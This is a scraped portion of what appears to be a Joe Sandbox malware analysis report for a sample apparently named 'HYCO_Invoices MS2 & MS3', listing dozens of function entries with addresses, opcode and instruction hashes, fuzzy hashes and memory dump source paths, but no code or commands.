                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                        • API String ID: 0-702105204
                                                                                                                                        • Opcode ID: 3abd4fe43030ae59d163d138dcb75028ca3cf0779a4e44708717db94e7ff9fdd
                                                                                                                                        • Instruction ID: 4f8cb3fecc94ef1f96611afe0a8f26b0de22e45c7c31efe3bb7f013c42e24613
                                                                                                                                        • Opcode Fuzzy Hash: 3abd4fe43030ae59d163d138dcb75028ca3cf0779a4e44708717db94e7ff9fdd
                                                                                                                                        • Instruction Fuzzy Hash: D40120357002059FD6245B57DC8CE5A7BE5EF82754F0C445EF7C10A562CB25AC40D75B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01092000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d0f8f6688969906c5b2cb6c1c166c06abd5668aafc629bd77024db52afb3ed30
                                                                                                                                        • Instruction ID: 8f204c6980809978d4f4989142f8a7a3b8c4219b8e013aa3ac77de9078a14675
                                                                                                                                        • Opcode Fuzzy Hash: d0f8f6688969906c5b2cb6c1c166c06abd5668aafc629bd77024db52afb3ed30
                                                                                                                                        • Instruction Fuzzy Hash: 1942C375608341ABDF65CF68C8A0A6FBBE5BF88300F08496DFAC29B250D771D845DB52
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01088158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9243b204518499654c9fb1bc86e91fcde7a8c64c39ba6aa13b48b6474857cf8d
                                                                                                                                        • Instruction ID: 6afe7efa9b9e17ffec2c9ecccbc3ed48600fbf10b2923bcef319603650f8773d
                                                                                                                                        • Opcode Fuzzy Hash: 9243b204518499654c9fb1bc86e91fcde7a8c64c39ba6aa13b48b6474857cf8d
                                                                                                                                        • Instruction Fuzzy Hash: 51426E75A142198FEB65DF69C841BADBBF5BF48300F54C09AE9C8EB242DB349981CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01002840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2d8c20e7cd1c8d285e0e19a51955240acef62d9122455ae568e6c761175d28ad
                                                                                                                                        • Instruction ID: 3a26c9413ee2f5f7a047ff4c0aa6e999e39e1e5413fac870dc71556f0e40a057
                                                                                                                                        • Opcode Fuzzy Hash: 2d8c20e7cd1c8d285e0e19a51955240acef62d9122455ae568e6c761175d28ad
                                                                                                                                        • Instruction Fuzzy Hash: 1E32FF70A007598BEBA5CF69C8447BFBBF2BF84704F94415DD9C69B284DB36A842CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0109A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: da092056550bf48f499faa87db51908253b9e54914b194a44d2b9989e9a66a5a
                                                                                                                                        • Instruction ID: 0eef8ec0fc36b3899078ae87f8c89723aedd4bf54716481bd4a5456fe23433bb
                                                                                                                                        • Opcode Fuzzy Hash: da092056550bf48f499faa87db51908253b9e54914b194a44d2b9989e9a66a5a
                                                                                                                                        • Instruction Fuzzy Hash: E122AE70704661CBEF65CF2DC4A437ABBF1AF48304F088499E9D68B286D735D452EB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01018DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c6bb7d5bacca0f2a3de322448b91b52246b21f0d0dadf14f0559a9a870f88905
                                                                                                                                        • Instruction ID: e50a4a7141edc98250e992b0ac0b102ce175e0dfc18b8db7cb8091512a1df532
                                                                                                                                        • Opcode Fuzzy Hash: c6bb7d5bacca0f2a3de322448b91b52246b21f0d0dadf14f0559a9a870f88905
                                                                                                                                        • Instruction Fuzzy Hash: 1B224E70E0011ADBDB55CF99C4809BEFBF6BF44314B1580ABE9859B255E738DE81CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 444e9b65c7fee5cbab4903ae5cfd88043efea82be127a78ba0ac340995b2ee2e
                                                                                                                                        • Instruction ID: dad9c693ff1615a8215dd77152e1966eef5afaf86de4e23d674bd61bbfa77d78
                                                                                                                                        • Opcode Fuzzy Hash: 444e9b65c7fee5cbab4903ae5cfd88043efea82be127a78ba0ac340995b2ee2e
                                                                                                                                        • Instruction Fuzzy Hash: 6C327E75A04209DFDB55CF68C480BAEB7F1FF48310F2485A9EA95EB361DB34A841DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01014A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                        • Instruction ID: ef74c067a92842dce0f4f21b68ec9f18261dc1da69f618d43c007d967c3c1665
                                                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                        • Instruction Fuzzy Hash: 21F16E71E0020A9BDF55DF99C990AEEBBF6BF48310F048169E985EB354E778E841CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0108892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1f897006849795d6877fab99d6f292e489c018e48c58f6742a0c67ca659990d0
                                                                                                                                        • Instruction ID: 8fdf1649dc27c54bb45f1874c85ddd9d29a60426fc61d14e906ba050125fb896
                                                                                                                                        • Opcode Fuzzy Hash: 1f897006849795d6877fab99d6f292e489c018e48c58f6742a0c67ca659990d0
                                                                                                                                        • Instruction Fuzzy Hash: 29D10371A0461A8BEF15DF98C841AFEB7F1AF88304F58C16AD9D5E7281E735E901CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f44518bc532b55a7e383c4bf82dd2abfd04a50bacbdcd915279f1d414ecfcc10
                                                                                                                                        • Instruction ID: 4bece83fef408fc6997aad87082014df703182746e302767b8a26f24bdbb9b73
                                                                                                                                        • Opcode Fuzzy Hash: f44518bc532b55a7e383c4bf82dd2abfd04a50bacbdcd915279f1d414ecfcc10
                                                                                                                                        • Instruction Fuzzy Hash: B8E19F71908346CFC714DF28C090A6ABBE0FF99318F158A6DE995CB361DB31E905DB92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FE8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8a5503eeb0ebd01b50441d9dc52526b161081b760103d2e7c1b5b709cf862abb
                                                                                                                                        • Instruction ID: 09cf1f8105325833c401543ec6b67f2eaf8832fc85b8dbddcf42bb5be3f2507f
                                                                                                                                        • Opcode Fuzzy Hash: 8a5503eeb0ebd01b50441d9dc52526b161081b760103d2e7c1b5b709cf862abb
                                                                                                                                        • Instruction Fuzzy Hash: 8AD126B2A002468BDB14EF26CC81BBAB7E5FF48354F144629F959DB291EB34D902DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01078243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                        • Instruction ID: 4f3fbd472057e7a8fb065934c8edc810bc4e8f4be5a3c5dd070ed830ffe2b2ea
                                                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                        • Instruction Fuzzy Hash: 37B17375F00605AFDB64DF59C948AABBBF9BF84304F10C45EAA8297790DA34E906CB14
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01000535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                        • Instruction ID: 1409008696540a019e49a9fe76e67c85c68c031a2749c53787bc31e3a7a63c04
                                                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                        • Instruction Fuzzy Hash: 1CB10731600646AFEB66DBA8C850BFFBBF6AF84340F140195E5D6DB285EB30D941DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01010DE1 Relevance: .3, Instructions: 295COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 46da88039572febeccfd50b93cfd0045d276c8291dcaf8880ac32db470580f94
                                                                                                                                        • Instruction ID: 74483e038e965486f87e4cc3973e46dd7178b25a56a2ddc76f4f3640f60b11ac
                                                                                                                                        • Opcode Fuzzy Hash: 46da88039572febeccfd50b93cfd0045d276c8291dcaf8880ac32db470580f94
                                                                                                                                        • Instruction Fuzzy Hash: FEC15C70E04259DFDB25CFA9C885AAEBBF5FF48344F10412DE585AB249D779A881CF40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 71fe7b6feab9364f317a4d4948f9ccee3f4f6fe4265f9a33f029f75c1285817b
                                                                                                                                        • Instruction ID: afaa098eda038697d010a4fe49c856b6a0b254612cb937eeed295e4977fda49e
                                                                                                                                        • Opcode Fuzzy Hash: 71fe7b6feab9364f317a4d4948f9ccee3f4f6fe4265f9a33f029f75c1285817b
                                                                                                                                        • Instruction Fuzzy Hash: E6C17974608345CFD760CF18C484BABBBE5BF88344F48495DE9898B2A1DB74E909CF92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c3650ee8daf244d84b25596150fa3a7c1cace8d3f32e941ec1496ca106bb89ae
                                                                                                                                        • Instruction ID: b547e26a92b66d69999eaf6a4490dc91382758109845193d0c84abae026429ab
                                                                                                                                        • Opcode Fuzzy Hash: c3650ee8daf244d84b25596150fa3a7c1cace8d3f32e941ec1496ca106bb89ae
                                                                                                                                        • Instruction Fuzzy Hash: C3B18370B002A58BDB74CF59C890BA9B3F5EF44710F1485E9E54AEB281DB34ED86DB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 391491a44d02ac1971adabb338a312e77989496c7925ba638d5e0c7691c84d81
                                                                                                                                        • Instruction ID: fa55a470ca2999340c9bfb7711aa3f85e1271888709b2eae7d020ad2c2407e8b
                                                                                                                                        • Opcode Fuzzy Hash: 391491a44d02ac1971adabb338a312e77989496c7925ba638d5e0c7691c84d81
                                                                                                                                        • Instruction Fuzzy Hash: C9A12531E0061A9FEB62DB58C948FAEBBE4BB04754F0501A5EEC0AB2D5D77C9D40CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01030185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c272d4529fa8396d26b20a39148f7fe67417b612353f9bf00b02d523eaf6c8c3
                                                                                                                                        • Instruction ID: ebfab87ad567a04a31862cdd2be6f755e7f73353695677b4638e646a08760eaf
                                                                                                                                        • Opcode Fuzzy Hash: c272d4529fa8396d26b20a39148f7fe67417b612353f9bf00b02d523eaf6c8c3
                                                                                                                                        • Instruction Fuzzy Hash: 08A1B170B027169FDB29CF69C590BAAB7E9FF84314F044069FA8597286DB34E901CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010C4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c91ea4c7d1cff72fee6831015b68d980c7f1b063805157ea11ab96f44ae37c4a
                                                                                                                                        • Instruction ID: dcf882422a22619f5d58d5756364059d5b3001f119e129d04fd3937ddaf83c64
                                                                                                                                        • Opcode Fuzzy Hash: c91ea4c7d1cff72fee6831015b68d980c7f1b063805157ea11ab96f44ae37c4a
                                                                                                                                        • Instruction Fuzzy Hash: 5CA1A772A04602AFD722DF18C990B6EBBE9FB58B04F45066CE589DB691C735E804CF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010760E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d47f40062cb0b4781ea6f5a38c508dea06cc88f53976977d763476334ce4eb77
                                                                                                                                        • Instruction ID: 780f249ed4e234ab7bd6152e5f0763d493443d9119201ceddd28f4b2ac94d98c
                                                                                                                                        • Opcode Fuzzy Hash: d47f40062cb0b4781ea6f5a38c508dea06cc88f53976977d763476334ce4eb77
                                                                                                                                        • Instruction Fuzzy Hash: 1791D671D00A19AFEB15CF58D884BAEBFF5AF48310F158159E681EB341D736E900CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0100E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 96fe32de5f85b2af6e60a01e7cddffd5ef73f3eb5bb8bebe24ad1e95ccd7af28
                                                                                                                                        • Instruction ID: 4653e27482c3edd927235550e04c54002a69986eb40e55cbf5208c5400284d73
                                                                                                                                        • Opcode Fuzzy Hash: 96fe32de5f85b2af6e60a01e7cddffd5ef73f3eb5bb8bebe24ad1e95ccd7af28
                                                                                                                                        • Instruction Fuzzy Hash: 0E915531A00612CBFB66DB59C444BBEBBE1EF94714F0548A9EDC5AB2C0EB35D841CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01046ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2794d517423aaee69e4f1678ec5e9bb72b0775cadc789e24b995d76e6c7041ef
                                                                                                                                        • Instruction ID: de5ce8ed616312b739f4226b1d605d74e0869c6778b8884aee1c2674e9ada394
                                                                                                                                        • Opcode Fuzzy Hash: 2794d517423aaee69e4f1678ec5e9bb72b0775cadc789e24b995d76e6c7041ef
                                                                                                                                        • Instruction Fuzzy Hash: 4C8183B1E0061A9BDB18CF69D990ABEBBF9FB48700F04853EE485D7640E735D941CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010BAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                        • Instruction ID: 75d0c2f9ab91e9fcb9554644b142c109af89994a75667b39ebfaa3612998b9a4
                                                                                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                        • Instruction Fuzzy Hash: C0815D71B00209DFDF19DF98C8C0AEEBBF6AF84210F1985A9D9969B345DB34E901CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f931f236654970e271f86db46ff339a6ac7d5cb848200901a88960c721317f36
                                                                                                                                        • Instruction ID: 2737fe0d15afb9adbcd63d48983fa421407dbcd728d9d16c27dcf005c20c0e51
                                                                                                                                        • Opcode Fuzzy Hash: f931f236654970e271f86db46ff339a6ac7d5cb848200901a88960c721317f36
                                                                                                                                        • Instruction Fuzzy Hash: BD816371A40619EFDB25CFA9C880BEEBBF9FF88354F108429E595A7250D730AC45CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0100C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b5b38f3ea4d90ab9bb149a4228bcba7edd21f2c8900c58ca1aadd4ec8a7be463
                                                                                                                                        • Instruction ID: 974aa8ceb4dbc41be9adffca770ee10c76c4d8a6c53d9cef3928581b47e8b6fa
                                                                                                                                        • Opcode Fuzzy Hash: b5b38f3ea4d90ab9bb149a4228bcba7edd21f2c8900c58ca1aadd4ec8a7be463
                                                                                                                                        • Instruction Fuzzy Hash: 6571E275C00625DBEB668F5AD9407BEBBF4FF58710F14819AEC86AB390D3755800CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01088D6B Relevance: .2, Instructions: 206COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 598be739bb7f6d7f450386bd3a8b3ea09d6f5f94fac8082bd77f18e636a55b28
